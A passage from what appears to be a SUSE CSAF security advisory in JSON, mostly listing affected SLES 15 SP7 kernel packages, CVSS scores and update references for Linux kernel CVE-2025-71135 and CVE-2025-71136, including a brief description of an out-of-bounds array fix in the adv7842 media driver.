"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71135",
"url": "https://www.suse.com/security/cve/CVE-2025-71135"
},
{
"category": "external",
"summary": "SUSE Bug 1256761 for CVE-2025-71135",
"url": "https://bugzilla.suse.com/1256761"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71135"
},
{
"cve": "CVE-2025-71136",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71136"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status()\n\nIt\u0027s possible for cp_read() and hdmi_read() to return -EIO. Those\nvalues are further used as indexes for accessing arrays.\n\nFix that by checking return values where it\u0027s needed.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71136",
"url": "https://www.suse.com/security/cve/CVE-2025-71136"
},
{
"category": "external",
"summary": "SUSE Bug 1256759 for CVE-2025-71136",
"url": "https://bugzilla.suse.com/1256759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
